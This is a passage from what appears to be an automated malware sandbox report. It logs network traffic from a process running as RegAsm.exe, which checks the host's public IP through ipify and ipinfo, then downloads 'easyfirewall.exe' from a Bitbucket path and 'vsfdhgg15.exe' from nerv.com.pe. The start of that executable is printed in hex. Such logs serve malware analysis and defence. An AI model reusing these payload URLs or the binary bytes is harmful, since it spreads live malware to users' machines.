                                                                                                                                                                                                                                Sep 21, 2024 13:35:34.885823965 CEST1236INData Raw: d5 49 4c 69 b2 c1 bd b6 7b a7 34 71 39 9c 96 90 82 68 54 5b d5 c8 79 5c b9 c7 93 f2 32 76 9d 51 3e d3 4e a1 55 9c 69 81 12 43 7b e8 86 5f 6c 5b 32 81 77 e2 dd ba 8b a0 16 ff a3 e3 39 cb 83 4e 8f c7 0f a2 71 d0 b7 68 7e f5 48 d9 a8 de 5e 70 42 c9
                                                                                                                                                                                                                                Data Ascii: ILi{4q9hT[y\2vQ>NUiC{_l[2w9Nqh~H^pB3+uRY)zF.x@Cf)$$'>IF}U,Gh8c5-LN>;Zwn#E8kaOp8W8sv{m8
                                                                                                                                                                                                                                Sep 21, 2024 13:35:34.885835886 CEST1236INData Raw: a2 3a 0b dd 18 54 7c 3a 71 7c 15 db 99 c2 3d 4f 91 b8 f2 84 18 f3 c2 3c 3d f5 c5 db 3c 73 0a 02 a5 31 d2 b5 5a 1f 9c 72 8a 4d ec da 9b 54 82 9b a1 2f db e1 b9 96 ef 17 39 ad 52 34 3d c5 7f cb 53 d5 d6 0d 08 b6 d7 a0 aa 1d b4 53 d7 9a 0a 0a 3d d7
                                                                                                                                                                                                                                Data Ascii: :T|:q|=O<=<s1ZrMT/9R4=SS=;!I$?ULQ%zE!,C^p\J+ge7NpA7mA!uc!0ucZpSW1b6Y4)cYbB.+Y"fUS5e{jMama<[R
                                                                                                                                                                                                                                Sep 21, 2024 13:35:34.885845900 CEST1236INData Raw: 63 24 90 6a 6c 16 a7 ca af 2c 67 f0 c4 db d9 ab 4c cc 5a 50 d3 1c 1a 46 76 9e 9e d6 7a 6a 2c 5c bd d0 b7 0a 51 33 b2 d5 2b 05 88 92 72 5a 01 72 7d 64 fb 92 4e f5 2d b5 5e 52 91 1c dd 61 ef b7 d9 a6 11 bd 80 30 b3 91 5b 2c bc e0 9c 4b 54 33 9f 37
                                                                                                                                                                                                                                Data Ascii: c$jl,gLZPFvzj,\Q3+rZr}dN-^Ra0[,KT37p2'F@qYB</:]^7KeH#f/9^$p.EWd='5|[L?D%I)a"*^* TDOCrKOZXXgU8I/
                                                                                                                                                                                                                                Sep 21, 2024 13:35:34.885858059 CEST1236INData Raw: e3 f7 d4 88 5f c7 e0 12 d3 03 c4 29 a0 92 c9 93 ad 6f 4f 61 9b 00 36 1e a0 ee e6 fb 9d ef a6 40 99 41 24 12 ce 46 3b 7b 35 1a be 33 76 d7 a7 0a 56 b6 da 9f 50 3f e2 e7 69 67 3a 58 a7 3d be 02 cf d6 4e e2 b1 a2 2e 3a 01 27 07 9a c1 6a 7c 04 d0 7a
                                                                                                                                                                                                                                Data Ascii: _)oOa6@A$F;{53vVP?ig:X=N.:'j|z-_)L3=i>*_yRc$Iql4+J}(W9k3kR%{\h]=9i]\1&!S=z8?xUZE,FuK,1
                                                                                                                                                                                                                                Sep 21, 2024 13:35:34.887568951 CEST1236INData Raw: 32 07 26 bc 82 b5 de 4e c4 33 cb 4c 68 86 d8 c4 be f5 49 3e 02 b6 ff 5f 8c a0 00 f7 e0 b7 3f 1d 25 b9 df fd 38 84 2a 55 7f 9c 7f 40 2c 51 81 10 8d 7b 05 a7 4f 0c 10 ba 4c d5 50 2d 72 cb bf ea 5d 04 dd aa 36 39 07 0b f7 f9 f9 b9 37 76 ce 67 0d 23
                                                                                                                                                                                                                                Data Ascii: 2&N3LhI>_?%8*U@,Q{OLP-r]697vg#M&-4$'VDMFqdZv2%*5cqxqNj{{0;U~(^Qk]p{jk?% 8cHY41ZW::Eevo9R
                                                                                                                                                                                                                                Sep 21, 2024 13:35:34.887578964 CEST1236INData Raw: 12 a4 38 a0 f6 e0 a6 0e 56 e0 61 7d 08 09 a9 8e 85 4a 11 49 18 27 ce 75 9b 90 57 8d f2 5b 7a 9a e1 cc 4b 6a 82 74 f5 60 3e 18 a1 82 8f 78 c5 71 66 d0 ed dc 8e 98 aa f3 d8 40 de 12 dc d1 97 15 95 74 0a 12 3e a6 d5 b6 f2 77 6b 70 64 dd a2 b8 5b 5b
                                                                                                                                                                                                                                Data Ascii: 8Va}JI'uW[zKjt`>xqf@t>wkpd[[QV#SC+7)CZcv>i(Oxx"l09HEm[dm\]SvMIm[+$?hqUvj/&M..:t1=wfL3ck
                                                                                                                                                                                                                                Sep 21, 2024 13:35:34.887590885 CEST1236INData Raw: eb 81 c9 fb a2 99 25 bd b8 e1 6c 5a 17 b9 f7 fa bd 36 b6 85 d0 83 ff 0f 14 ff 46 14 26 95 61 b2 1e 3c 84 97 d6 69 73 c0 de 67 58 3d c7 04 17 09 0c 66 d6 45 01 e4 3a f4 1a ef dd 06 7b 1f f8 cd fa 3f 82 4f c3 89 2e 46 cc 45 dc bd ee 2e 78 af 88 24
                                                                                                                                                                                                                                Data Ascii: %lZ6F&a<isgX=fE:{?O.FE.x$\r2r<!*ky[g&ACM7<=9u;=GzuP^np]IdPYzSd^E>^g}kymuk;,dt;oh)y}Kl0
                                                                                                                                                                                                                                Sep 21, 2024 13:35:34.893510103 CEST1236INData Raw: 0d 26 3e 62 61 e7 f4 97 62 d5 b4 44 3d 61 92 d3 b9 da 81 b5 41 c4 9e 57 f3 74 bf 00 d9 55 b4 4c 97 d2 e8 e2 cc 0c bc bf ac 7a a1 26 cf 0a 2d 62 d2 1e b0 e4 c4 72 a3 3a c4 a9 17 f2 31 60 e9 a0 c2 ec 90 df dd 0d f0 20 b3 38 a5 d6 0f ef b8 76 3b 04
                                                                                                                                                                                                                                Data Ascii: &>babD=aAWtULz&-br:1` 8v;1>:j\oA?snOMZ{K4OpRz+f1[Ue_&`grIoB),^2{"KO5YpX"JAQLckDF


                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.949706104.237.62.2134436388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:33:34 UTC202OUTGET /?format=json HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: api64.ipify.org
                                                                                                                                                                                                                                2024-09-21 11:33:34 UTC156INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:34 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 20
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                2024-09-21 11:33:34 UTC20INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                                                                                                                                                                                Data Ascii: {"ip":"8.46.123.33"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.94970734.117.59.814436388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:33:35 UTC236OUTGET /widget/demo/8.46.123.33 HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Referer: https://ipinfo.io/
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: ipinfo.io
                                                                                                                                                                                                                                2024-09-21 11:33:35 UTC458INHTTP/1.1 200 OK
                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                Content-Length: 1025
                                                                                                                                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                date: Sat, 21 Sep 2024 11:33:35 GMT
                                                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:33:35 UTC932INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20
                                                                                                                                                                                                                                Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
                                                                                                                                                                                                                                2024-09-21 11:33:35 UTC93INData Raw: 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                                                                                                                                                                                Data Ascii: k Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.949723185.166.143.504436388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC232OUTGET /kcatelin/jameson/downloads/easyfirewall.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: bitbucket.org
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC4997INHTTP/1.1 302 Found
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:42 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Server: AtlassianEdge
                                                                                                                                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-46b2-82dc-be29f7fa498f/easyfirewall.exe?response-content-disposition=attachment%3B%20filename%3D%22easyfirewall.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGNWBPVIG&Signature=RG7gLpLQM9DgrtzKECr%2F5hgaEBw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEFQaCXVzLWVhc3QtMSJHMEUCIQDFdamkZ04A05ya5JjE%2BO96KfXxuSlOnxf1KU2WbhcgUAIgZVAiwI6sPTiv1NV5OPTMgcBSTcThYLQvzmHVuZLepfEqsAIIjf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEWlad7oE1ErA4%2BxniqEAkPBXDxCFRBvIDaMXH7btuCQePvBHv56Z32PJd%2BrgVAazFvcT%2BdKnWonvbgD%2Bl83gjxQvJNinimAUee0zl9An1zjHrdCynGOjIYCd10WgZZ37gvIdBvOekdVSJQN4VvROptCwbViUPgEar%2FvniBV%2B9dqfZdJIelwOng6Fln8TYeg%2Fl7wUG0nZY4e%2FMaCUav1Yku%2FrJGpCSh4n1nCWTKS7G8gb01L5gOI8TnzTwcjXoM61eavAdUsF%2FtJR2uJ0%2BlBHAgp11FQKPWY6BApQnVnlTsKXD%2Fzo4xyODNargGwFCcO8KVN97GtOSH0yfnXUN2LEsVwXZ144uxzDcaZqLaCMuxhFmrDMODaurcGOp0BK2eIjmGLV4b2uwA8kI4vRD9zrjU%2BmUC3l1cVxad27xvHP82pnJ2i1cZxwMDbzFINMt0y8GSW3msaumnuqBQuixm4zhYMg6r [TRUNCATED]
                                                                                                                                                                                                                                Expires: Sat, 21 Sep 2024 11:33:42 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                X-Used-Mesh: False
                                                                                                                                                                                                                                Vary: Accept-Language, Origin
                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                X-Dc-Location: Micros-3
                                                                                                                                                                                                                                X-Served-By: f04d99294ac3
                                                                                                                                                                                                                                X-Version: 80907f89f58b
                                                                                                                                                                                                                                X-Static-Version: 80907f89f58b
                                                                                                                                                                                                                                X-Request-Count: 1269
                                                                                                                                                                                                                                X-Render-Time: 0.05214095115661621
                                                                                                                                                                                                                                X-B3-Traceid: c750c50bccbf4558bf24c6c191017286
                                                                                                                                                                                                                                X-B3-Spanid: d89faa1104ff3668
                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.p [TRUNCATED]
                                                                                                                                                                                                                                X-Usage-Quota-Remaining: 999147.509
                                                                                                                                                                                                                                X-Usage-Request-Cost: 868.03
                                                                                                                                                                                                                                X-Usage-User-Time: 0.025356
                                                                                                                                                                                                                                X-Usage-System-Time: 0.000685
                                                                                                                                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                X-Cache: MISS
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                Atl-Traceid: c750c50bccbf4558bf24c6c191017286
                                                                                                                                                                                                                                Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                                                                                Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.2.949727162.241.61.2184436388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC200OUTGET /vsfdhgg15.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: nerv.com.pe
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:42 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                Last-Modified: Fri, 20 Sep 2024 21:15:01 GMT
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 423328
                                                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC7943INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3e e5 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1c 06 00 00 08 00 00 00 00 00 00 ee 3a 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL>f: @@ `
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: 40 2e 88 34 1d eb 0f 56 25 84 77 25 8c 9b 8f 34 f5 00 29 82 90 8c 06 05 b3 89 cf 78 55 8c 0c c1 4c a6 6f 87 b1 44 c3 bd c1 02 81 85 9b d6 54 3d 46 f9 6f 7d d1 d1 16 c8 60 f6 59 f4 3a 40 da 1c ec 0e dc eb 42 4f b7 5a fd 65 c8 d8 60 6d 63 ab 71 8a bc 7a 7a b4 56 ce a8 1f a4 78 a7 30 b0 66 3f 15 71 eb aa 77 d8 10 f6 42 ef d7 f0 d9 60 87 5a 38 86 e0 29 00 0a bb 95 65 99 53 74 04 77 81 39 12 30 c1 99 17 50 34 41 5b 8c e0 ea 06 2a 8f fe 7f 0d cf 0b 13 ba 5e 3e 9a 5c 2c 90 27 40 70 d6 a3 fe 5a 2c ac 81 22 e8 66 53 ec ed 62 d5 ba b1 44 76 18 45 0b 27 6a d6 17 77 ac e9 17 61 b8 1a fd 37 ac 08 75 35 ec c7 d3 6c 2d d0 b9 e8 0a 83 7c a6 16 2e 68 91 a1 0a 2e 4f 4c 2c fa bc b7 8f 0c 62 bb 7b 22 26 e2 37 53 e9 ab 2d 83 97 17 4c d0 16 04 10 00 b6 57 39 0e b0 87 32 16 90
                                                                                                                                                                                                                                Data Ascii: @.4V%w%4)xULoDT=Fo}`Y:@BOZe`mcqzzVx0f?qwB`Z8)eStw90P4A[*^>\,'@pZ,"fSbDvE'jwa7u5l-|.h.OL,b{"&7S-LW92
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: 9b 8c 02 2a 10 54 80 aa bc 93 84 b2 db d2 5a cf 61 0c d6 03 5a fb 26 fa 61 56 fd 81 e8 17 f9 d5 73 64 5d 71 76 3e 99 7b 19 bc e7 9a c3 dc 8a 55 6f f9 7d 75 e0 0f 47 86 19 ff da b2 bd 78 43 14 a9 dc b9 a4 b6 5a b4 34 76 18 97 ba 47 dd 83 a9 07 f7 4b a0 78 bc f7 e8 38 99 63 a0 2e e5 26 c1 e1 3d 71 15 64 26 a9 2f e4 fe 76 b3 5b 93 55 88 23 bb f3 ff 89 3d a4 3f 6d a7 d8 20 07 34 65 ee cd 1d f0 7a dc 2d de cb 43 d4 5c 33 9f 4f 78 b5 0f 3c c7 03 c0 e1 ad b0 38 0c 54 fc 15 e8 88 a2 c2 92 97 8b 64 f8 0b f5 50 c4 76 43 77 07 51 52 d6 20 7e 22 18 8d 8e ee 2b d6 c6 4f 9f d4 2b 28 c5 71 ff ad ce c9 c9 d0 fb 12 be 2b 5e 64 5e 32 1f 92 cc 8c 9d 82 86 35 36 60 b4 64 c3 52 5b 25 9c df da 1a 88 b6 c6 64 e9 f4 55 c5 90 91 1f ad 38 ed e1 68 52 32 5d d8 6d 8f 8c b7 09 a7 01
                                                                                                                                                                                                                                Data Ascii: *TZaZ&aVsd]qv>{Uo}uGxCZ4vGKx8c.&=qd&/v[U#=?m 4ez-C\3Ox<8TdPvCwQR ~"+O+(q+^d^256`dR[%dU8hR2]m
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: e5 66 7c 0f 55 38 09 e0 9b c8 33 26 9e 54 37 ae 54 6a 8b 9a 71 05 57 9a 89 c5 68 27 2a 87 ee 29 3c 24 56 c0 0c b6 df 2e bd 06 b0 38 22 34 36 65 47 4c 18 e3 d4 b2 2b 37 b7 76 8b d4 dc 10 3e 98 18 de 0c 01 c7 7e a6 81 06 74 4d e3 80 c9 14 e2 03 12 93 21 25 f2 12 1f 4f dd 65 e0 91 e1 5d 67 99 37 5c ae 52 e6 cb 33 df 97 c7 a5 5f d5 0f 82 c0 b8 86 ad 6c f8 3a 98 ed e0 cf 2c b5 ed b7 8a a7 7e dd 9c ad 09 71 f7 52 4b 27 47 0a c6 99 ff 98 82 59 be e9 e5 9a c1 6c 1e a8 82 64 f0 57 4e cc e2 f7 f4 5a 40 fc 4e 3d 14 35 4b da 2a c3 3c 9b 2e 79 d8 67 ce 25 89 f3 16 c5 e1 75 27 6e c1 b1 0b 13 ba 5d a2 6b 63 9e 01 5c 31 9a b7 71 c2 5c bd 29 e9 6e f2 95 bd f7 5a c6 c5 47 d1 d2 59 70 14 61 f2 2a da c9 68 9c 1d ca 43 c8 12 ca e1 0d 3d 1c 6b c7 10 d2 7b 61 d0 a6 ad 1f 83 ab
                                                                                                                                                                                                                                Data Ascii: f|U83&T7TjqWh'*)<$V.8"46eGL+7v>~tM!%Oe]g7\R3_l:,~qRK'GYldWNZ@N=5K*<.yg%u'n]kc\1q\)nZGYpa*hC=k{a
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: c0 f5 1a b4 72 8b ca 4c 82 8f c7 eb be 92 b6 0c fd d2 7a ad 70 69 c7 78 57 fd 91 91 74 ef 4b 09 1f ef e9 3a f5 bc df bb f6 9c b8 29 70 15 30 75 83 6e 8c 23 77 5c ab 96 54 8a 45 52 a9 04 ea f5 fd 26 f1 b8 b5 79 47 f3 25 84 41 3f bb d0 01 8d d3 10 ce 01 19 32 05 9e bb 6b 9b 75 e9 0c c7 b9 48 c4 06 34 da 00 f1 25 34 1e 72 fd 9a b5 52 74 87 eb c0 34 f1 90 5f 84 00 8e d8 9a 91 93 d9 55 45 45 37 15 d5 34 79 1f af 88 cd 5f 2a 4f 60 c1 9e 0c 85 74 e1 e0 ff d2 3f 3c b8 2d b9 95 e3 9b f5 3b 5b 2f 7d 9f 4f ca 82 c7 df bf c6 5c 10 01 e0 6a cf aa 7f 08 1f cd 8a 83 1f e3 7e b0 f5 a7 5e 61 12 ab fc 36 34 ba 3d cb 4a bc c4 52 1f b9 c3 e0 e2 5e b8 4d a6 dc fa 1c 93 0d 65 47 7e 3b e1 1c 5d fb 1e fb 52 ea 2b 41 ef 7b 90 15 bd 6a 0c d2 e0 6c a5 7d 0e 93 3d 6f 94 bd 9e 47 93
                                                                                                                                                                                                                                Data Ascii: rLzpixWtK:)p0un#w\TER&yG%A?2kuH4%4rRt4_UEE74y_*O`t?<-;[/}O\j~^a64=JR^MeG~;]R+A{jl}=oG
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: 78 07 c1 4f 58 a2 ee 75 cd 06 2a 0d cf 94 6e 4f 4d e6 fb fd bf 6e 2c 44 b4 c5 77 fc 32 81 fb 3f d8 0d b2 31 c8 b5 cd 0b 60 41 66 60 19 99 5d da d3 54 a7 4f bd ec bc 39 46 63 0e b9 bb 9f 5d d2 c0 76 44 47 8b dd d4 44 13 53 cc 92 0f 21 d1 88 b5 65 5a a5 eb 35 31 27 a9 b3 aa a5 ec c1 c9 8e ad 4f a5 d6 80 28 a7 d5 d1 16 92 56 da ad 21 87 8e 72 12 d4 5a 0b c5 3e 29 3a e9 6e ce 8e 04 d6 d8 43 8a de 2d 6e 93 cb 25 66 01 26 de 4c 2e 8d 8a 3b 94 82 2b 53 1a 53 99 27 f1 4b d1 4f 22 1d 9d de ea e0 12 c9 21 36 08 c7 4c 11 13 7f 09 57 47 36 fd c0 f7 df 5a 77 55 fd 2b 96 c3 df 33 49 bd 3f bb 95 1a bb ea 0e 07 d0 02 90 d7 9e 06 34 7b f7 0a 96 30 cf 2e 03 6e d0 d5 bc 1c 18 4b f9 4e d8 6c a0 1f e9 6b a6 34 4d d1 c1 8a 43 df 2a 9d de 9a e6 fa bb 9d 78 ef 54 e1 6c 07 1b eb
                                                                                                                                                                                                                                Data Ascii: xOXu*nOMn,Dw2?1`Af`]TO9Fc]vDGDS!eZ51'O(V!rZ>):nC-n%f&L.;+SS'KO"!6LWG6ZwU+3I?4{0.nKNlk4MC*xTl
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: 6e fb 58 47 20 b9 48 e7 23 e9 aa 01 25 a4 29 33 20 64 64 50 86 90 53 9d b4 86 2f 11 60 cd 2e a5 a3 46 ba 8d 52 a9 ae 88 a9 75 47 5e a1 18 3f 36 0a 89 88 4b 02 53 7c 1c 4c 49 42 07 c9 d1 31 5d 70 07 69 4f 45 af cb 38 5b 51 41 f4 ef c6 2a 3b 71 a3 fb 0b 9c 8f 3b c9 cc c5 c3 31 19 0b 8c 37 76 47 df 34 37 b4 33 b8 1b 94 64 33 51 be d9 09 89 c8 99 b8 69 e9 3d 80 cf 66 e0 1c 2a 81 e6 6a d9 83 f6 82 ef 74 21 9e fd bb 36 23 29 b0 1f dd 2b 93 6f b2 07 df 03 7d d9 2e c1 c9 c2 06 be e4 1e d2 34 da 6f 4b 51 ce 8d 1d 50 60 4c 8c 74 a7 ec 0b 28 e3 df db 15 55 01 fe 4b c8 d2 6e 48 78 a6 7c bf 70 3f 76 e4 27 f5 83 ff 92 a0 91 f9 dc 5d ef 9e 44 da 00 73 10 23 a4 b6 80 9b 9d fc 3f 2b 4f ea 5d 8b 8e be 47 92 89 51 a1 97 5c d6 27 85 35 bd 35 1b 02 8d 4b 13 3c fb f8 ae 6f 72
                                                                                                                                                                                                                                Data Ascii: nXG H#%)3 ddPS/`.FRuG^?6KS|LIB1]piOE8[QA*;q;17vG473d3Qi=f*jt!6#)+o}.4oKQP`Lt(UKnHx|p?v']Ds#?+O]GQ\'55K<or
                                                                                                                                                                                                                                2024-09-21 11:33:42 UTC8000INData Raw: b1 d1 37 88 52 5f d8 26 1f ef 27 fe af c8 7f c2 28 77 9c ac 05 a3 64 a4 c9 38 a4 47 63 ef 96 e8 e2 cb 8b de c4 05 75 eb 63 3a 1b 1c ac a8 ff b1 d4 cb e6 21 f6 b0 02 93 68 86 55 17 ee 09 dd 0d 27 b7 ea 6d a3 4b c8 23 77 50 e8 cb e0 17 75 5e d6 ab 48 01 91 fa 21 0f 4e 03 d2 c2 fc 29 63 e1 70 d1 06 84 95 47 93 d3 7b 2e 83 36 04 c5 4d f7 9b 05 0c a4 cb a3 46 b8 bc f9 0d 45 a6 7a 0c 8b 27 b0 c5 ea 7b 34 d5 3f 9f 18 5f 54 d6 45 a3 ba a6 f4 20 e3 1d 73 ef 1a 00 2b 4a fc 3c 1a 6c 7f e8 5e 11 62 23 4a 98 74 91 48 34 0e 96 bf 91 a4 9d 2c b5 c1 16 9a be e6 52 12 5c 67 cd bf a1 f5 5b 45 f2 23 15 87 bf e9 aa ec b2 12 d1 e1 fb ab d5 16 30 1c d8 73 62 ad fa e8 3c f6 dc 2b d0 b2 a0 2a ae 54 fb 55 c6 91 21 53 60 b6 c1 72 41 ae c7 a9 16 0d 9e ba 29 09 86 24 cc fc 92 92 7d
